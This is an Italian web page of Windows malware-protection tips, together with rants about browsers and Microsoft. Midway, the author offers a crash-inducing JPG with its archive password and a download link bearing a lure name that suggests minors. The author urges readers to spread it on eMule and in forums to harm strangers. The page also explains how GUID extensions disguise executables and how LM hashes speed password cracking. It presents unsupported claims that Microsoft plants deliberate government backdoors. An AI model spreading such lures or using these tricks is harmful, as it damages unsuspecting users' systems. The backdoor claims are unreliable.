PROTEZIONE DAL MALWARE

Alcune semplici contromisure possono darci un ragionevole margine di sicurezza contro le minacce come virus, keylogger e contro il malware in generale. 
 

• In "esplora risorse", "proprietá cartelle"  deselezionate le voci "nascondi le estensioni", selezionate "visualizza file nascosti" e cliccate su "applica a tutte le cartelle"  avrete un maggior controllo sui programmi che eseguite.

• Non eseguite, per nessun motivo programmi eseguibili (.exe .com . bat . scr) arrivati via mail, spesso compressi con winzip.  Spesso vengono scaricati programmi scherzosi, mostranti animazioni e musichette che vengono poi fatti circolare tra amici.   Tipiche le "cartoline animate" di auguri che vengono inviate in occasione di compleanni o festivitá. Purtroppo questa (deprecabile) consuetudine ha contribuito a creare l' abitudine a cliccare su tutto quello che arriva per posta.   Spesso questi programmi, sotto l'apparenza innocua possono nascondere brutte sorprese. NON POSSIAMO SAPERE cosa nasconda un eseguibile, a meno di esaminarlo con un disassemblatore, cosa che pochi possono fare.    Nel dubbio NON LANCIATE PROGRAMMI ESEGUIBILI ARRIVATI PER MAIL.

• Controllate le proprietá di un eseguibile prima di lanciarlo:  é sufficiente, invece che cliccarci ed eseguirlo  scaricarlo in una cartella, cliccarci con il pulsante destro e cliccare su proprietá.  Cliccate poi sul tab "versione" appariranno una lista di voci, scegliere "nome societá" : vi apparirá il nome del produttore del software.  Questa voce, benché possa essere modificata generalmente manca o é lasciata in bianco nei programmi malware. Inoltre se é presente la voce "certificato di firma digitale"  allora questo é  un indicatore sicuro della provenienza dell'eseguibile.    

• Anche se questa voce puó essere falsificata ci sono programmi che RICONOSCONO la firma originale: per esempio Autoruns riconosce l' origine di un programma in avvio automatico anche se la voce "versione" é stata falsificata.

• Prima di lanciare un allegato, che sia un file di word, excel, winzip salvatelo in una cartella, aprite la cartella con gestione risorse e lanciatelo solo dopo averlo esaminato; anche un esame sommario, eseguito controllando dimensione, proprietá, estensione e lunghezza del nome puó essere adeguato:  controllate in particolare le estensioni (  tipico rinominare un file come file.doc.exe) o i nomi eccessivamente lunghi e con molti spazi (tipo "ragazze sconce.jpg                        .exe" ) in casi simili l'allegato é senz'altro un virus od un altro programma maligno. 

• Utilizzate un programma di visualizzazione dell'esecuzione automatica:   In windows una gran quantitá di programmi e programmini si avviano automaticamente all' accensione del computer, é una cosa che serve al normale funzionamento del sistema. Purtroppo questa caratteristica é abusata e molti programmi si avviano automaticamente anche fuori dal nostro controllo.Virus e keylogger, tipicamente modificano il registro per avviarsi automaticamente ad ogni riavvio. Per rimediare a questo possiamo utilizzare programmi che visualizzino tutto quello che windows esegue automaticamente. Usando utility gratuite come Autoruns, possiamo anche scegliere se un programma debba essere eseguito automaticamente o no.

• Utilizzate client di mail e browser SICURI.  I piú insicuri sono sicuramente Internet explorer ed Outlook express : hanno una lista di vulnerabilitá "infinita", che nasce dalle prime versioni e continua ancora oggi. 

 

• Outlook express é stato responsabile di una delle peggiori epidemia di virus :  il ceppo klez / nimda, giá accennato sopra, che possiamo definire, similmente alle epidemie di peste "prima grande pestilenza", ora pressoché terminata; la "seconda grande pestilenza" é esplosa con la vulnerabilitá DCOM di windows xp-2000 e la diffusione del virus blaster e varianti, e non é ancora terminata.

• Internet explorer ha molteplici vulnerabilitá ed insicurezze, basate su tecniche come javascript, activex,  plugin insicuri ed altri innumerevoli bug, come del resto ha giá avuto modo di sperimentare chi utilizzi internet explorer per visitare siti insicuri (porno o di crack) facendo il pieno di spyware, dialer e virus.

• Firefox é una valida alternativa ad Internet explorer, ma per la sicurezza non é molto meglio: appena uscito ha giá raccolto una serie di vulnerabilitá che non possono non preoccupare pensando al futuro.

• Un browser leggero, veloce e sicuro che uso io stesso e che mi sento di consigliare a tutti é Opera : non ha vulnerabilitá di rilievo, non scarica immondizia activex, avvisa in presenza di certificati irregolari, scarica avvisando e senza eseguire quello che exploder esegue senza avvisare, non scarica automaticamente aggiornamenti, plug-in ed altre cianfrusaglie inutili e pericolose. Con alcuni siti Opera puó dare dei problemi, ma non é un gran problema: generalmente i siti con cui Opera non va sono, generalmente:

• siti italiani (generalmente fatti da incompetenti)

• siti truffaldini (che obbligano ad usare IE per far scaricare software truffaldino)

• entrambe le cose

• Un client di posta esteticamente un pó spoglio ed alquanto complesso da configurare ma gratuito, potente, funzionale e sicuro é pegasus mail: lo uso io stesso e lo consiglio a tutti. Un altro programma gratuito molto valido, é Koma mail. Recentemente é stato dichiarato freeware anche uno dei programmi piú conosciuti ed utilizzati: Eudora.  In alternativa esistono programmi validi ma non gratuiti come Poco mail o Thebat!.

Ma quanto fa schifo Internet Exploder ?

Tanto ! qui, per esempio ci resta secco subito, qui invece viene eseguita la calcolatrice di windows ! (é una vulnerabilitá molto grave, altri siti possono eseguire quello che vogliono sotto il vostro naso !)

 

Il Cert, comunque ha avvisato tutti: adoperate quello che volete ma non Internet Explorer ! ^[2]

 

 

Ed ecco un altro scherzetto, questo non manda in crash internet explorer, no, questo é un jpg di solo 68 byte che manda in crash proprio l' explorer, il "gestione risorse" di windows xp !

L'ho racchiuso in un rar per pietá verso di voi perché, una volta scaricato basta passarci sopra con il cursore per mandare in crash gestione risorse !  Mi é toccato anche mettergli una password o quegli idioti di Yahoo mi classificavano il sito come "potrebbe danneggiare il tuo computer" !

La password é    baluba

Gli ho anche dato un titolo invitante... potrebbe essere un idea metterlo su Emule, cosí che chi se lo scarica... poi é sistemato ! 

Altrimenti date solo il link:  http://www.cryptohacker.com/18yr_lolita_naked.rar e mettetelo in un forum: 

ci sará da divertirsi !

 

Perché windows é cosí pieno di buchi ?

Diciamo che non é propriamente un caso, ma che molte "vulnerabilitá" in realtá sono bug VOLUTI (li chiamo "bugdoor") grazie ai quali chi possiede le giuste informazioni puó introdursi a piacimento nei nostri computer e fare i propri comodi 

 

Una vulnerabilitá (voluta!)di windows 95-98, ora risolta su win2000-xp é il cosiddetto "Guninsky bug": dando ad un programma (dati od eseguibile) un estensione particolare si fa in modo che windows gestisca quel file in modo particolare: per esempio cambiando il nome di un file testo readme.txt in readme.txt.{00020810-0000-0000-C000-000000000046}  windows gestirá quel file come un file di excel, pur mantenendo il nome readme.txt e senza minimamente visualizzare i codici tra parentesi !

Oppure cambiargli nome in readme.txt.{645FF040-5081-101B-9F08-00AA002F954E} ed il file diventerá un cestino!

 

Analogamente é possibile far passare degli eseguibili (anche maligni) come legittimi file archivio !

 

Anche le vulnerabilitá IFRAME in Outlook 5.0 (con windows 98) e DCOM di windows 2000/2003/XP che hanno originato le grandi epidemie virali di cui parlavo sopra mi sembrano piú backdoor studiate a tavolino che vulnerabilitá originate per caso. 

 

Pensiamoci un attimo: quando uscí windows 98 le adsl non erano molto diffuse, ci si collegava per lo piú con il telefono, si stava collegati quanto tempo bastava e ci si scollegava.

Beccare on line un determinato computer era alquanto difficile, il modo migliore per propinare un trojan era via mail... e windows 98 veniva venduto con una vulnerabilitá sfruttabile via mail (le famose "mail che si eseguivano da sole", come qualche pollo utente di outlook express ricorderá).

 

Nel periodo in cui uscí windows XP le adsl si erano diffuse, i computer rimanevano on line molto tempo, il modo migliore di propinare un trojan era da remoto... e windows XP usciva con una vulnerabilitá sfruttabile da remoto (la schermata che diceva "windows sta per riavviarsi")

 

Non sono mie fantasie: un Steve Gibson, un grosso esperto di sicurezza la pensa come me, dato che ha affermato senza mezzi termini che una delle innumerevoli vulnerabilitá di windows, questa legata al  media player che consentiva di eseguire codice in remoto era una backdoor deliberata ! [1^] [2^] 

 

Non so che tipo di licenza avete nel vostro computer, ma spesso, accedendo al computer di conoscenti con windows xp vi sará capitato di ricevere il benvenuto da una poco simpatica scritta che vi avverte che quella copia di windows non sia originale. É una "innovazione" chiamata "Windows Genuine Advantage" caricata di nascosto con agli aggiornamenti: un programma che si installa di nascosto, raccoglie informazioni, e le spedisce di nascosto alla casa madre; in altre parole uno spyware !

 

Pensiamo ad un aspetto importante: la protezione delle password : i windows 9x  permettono di proteggere le password dei collegamenti di rete e dei servizi internet tramite i famosi file "pwl": all'avvio di windows viene richiesta una password (la famosa "password di rete", quella di cui tutti si chiedavano cosa servisse) e questa password viene usata per criptare e decriptare con l'algoritmo RC4 il file pwl, contenente tutte le password. 

 

Sembrerebbe un sistema razionale, il problema é i programmatori microsoft fecero un "errore": casualmente implementarono male la crittografia e, con una minima potenza di calcolo risulta possibile estrarre TUTTE le password memorizzate nei PWL, cosa facilmente fattibile con programmini freeware tipo PWL-TOOL. (Una volta scoperta la gherminella il bug dei pwl fu "corretto" con win98)

Ma arriviamo a windows NT, 2000 ed Xp: a differenza del 9x permettono di proteggere gli accessi con una certa efficacia, memorizzando le password di accesso in modo sicuro, mutuato dal sistema UNIX: non é possibile recuperare direttamente le password, perché vengono memorizzati solo gli hash, ^[1] quindi l'unico sistema é l'attacco a dizionario: vengono provate tutte le password possibili ed immaginabili, generalmente da un mega elenco di tutte le parole possibili, appunto un dizionario (per questo vi viene detto di NON usare parole comuni nelle password !).

 

Quindi se l'utente ha utilizzato una password abbastanza complessa non sará possibile accedere alla sua password se non dopo anni ed anni di elaborazione, giusto ?

Sbagliato !

 

Il problema é che la Microsoft ha fatto un altro "errore": l' LMHASH, che in microsoftese significa "backdoor per recuperare le vostre password alla faccia vostra" in pratica le password vengono divise in tronconi di max 7 caratteri, tutti i caratteri vengono trasformati in maiuscolo e di questi tronconi viene calcolato l'hash. Questi tronconi, che sono, in pratica scorciatoie per arrivare alle vostre password vengono aggiunti al file SAM che contiene le credenziali d'accesso. 

 

Se so dove cercare e recupero questi hash-scorciatoia posso craccare password anche molto complesse in poche ore quando, normalmente sarebbero necessari SECOLI. Naturalmente di questa "caratteristica"  la microsoft non ha fatto parola (se non con le agenzie governative che gli commissionano le backdoor) Questa vulnerabilitá é stata scoperta e pubblicata (assieme ad un tool per craccare le password di windows) dal gruppo hacking L0pht.  

 

Non riesco a pensare ad un altra funzione di un meccanismo del genere se non di servire da backdoor, indebolendo in maniera estrema il meccanismo con cui le password vengono protette.

 

Facciamo due conti, su quanto possa facilitare le cose questa trovata, nell' indebolire le password di windows:

 

Mettiamo che io voglia utilizzare una password forte, di 11 caratteri, maiuscole, minuscole e numeri, per esempio  Risi3Bisi74  Questa password usa il set maiuscole+ minuscole+ numeri (26+26+10) = 62 caratteri ed é lunga 11 caratteri, quindi una ricerca esauriente di tutte le password possibili richiederá al massimo 62¹¹ tentativi cioé ben  52.036.560.683.837.093.888 tentativi  cioé cinquantadue miliardi di miliardi.

 

Ma dopo il "trattamento" dell' LMHASH ecco che la nostra password viene trasformata in due tronconi di 7 caratteri l'una, e tutti i caratteri diventano maiuscoli; non sembra una riduzione da poco, ma ricordiamoci che stiamo parlando di potenze:  il set di caratteri si riduce a 26+10 = 36, la ricerca esauriente (che viene svolta concorrentemente: i due tronconi vengono ricercati insieme) richiederebbe quindi al massimo 36⁷ tentativi cioé 78.364.164.096, cioé settantotto miliardi di tentativi. 

 

Un potente computer capace di cercare un milione di password al secondo impiegherebbe, nel primo caso (senza LMHASH) cinquantaduemila miliardi di secondi, ovvero un milione e seicentocinquantamila anni.

 

Nel secondo caso (con LMHASH) settantottomila secondi, ovvero ventuno ore.

Ogni commento mi pare superfluo: per di piú la Microsoft, dimostrando di avere una faccia di culo non da poco ha introdotto, con windows 2000 la "policy password sicura", con cui in pratica l'utente viene obbligato ad introdurre una password lunga e sicura, come quella vista sopra, dimostrando di preoccuparsi per la nostra sicurezza e privacy, sapendo bene peró che, grazie ai loro trucchetti un furbastro imbeccato da loro (polizia ed agenzie governative) potrá craccare la password in una giornata.

 

 

Mi sembra un pó dura credere che la Microsoft abbia incorporato caratteristiche del genere per sbaglio: chiaramente sono vulnerabilitá volute (delle "bugdoor") inserite di proposito, proprio perché le agenzie governative possano somministrarci impunemente spyware e keylogger ed infilarsi a volontá nei nostri computer.

 

Per rimediare al problema della protezione crittografica dei dati dei sospetti, difatti l' FBI utilizza una serie di programmi spia, i cosiddetti  policeware. 

 

Anche la polizia tedesca fa largo uso di policeware, e non ci sono motivi per non credere che anche la polizia (o LE innumerevoli polizie) italiana facciano altrettanto ed utilizzino dispositivi del genere per penetrare nei computer protetti.

 

Qualcuno potrebbe chiedermi del perché aziende che dovrebbero occuparsi solo di business si scervellano tanto a spiarci e schedarci, la risposta é che... non devo rispondere io. 

 

Io mi limito a tenere informato il pubblico, il fatto che vengano messe in campo tecnologie anche avanzate con l'unico, palese scopo di violare la nostra privacy é un fatto innegabile, come dimostra lo scandaloso caso delle stampanti spia.

 

LINKS ESTERNI

• Vulnerabilitá file pwl

• Voce L0pht di wikipedia

• Spionaggio industriale con keylogger

Vulnerabilitá gravi in Internet Explorer

• Esecuzione remota in IE

 

1^.Meccanismo sicuro di memorizzazione delle password in windows/unix

2^ Articolo su Pc world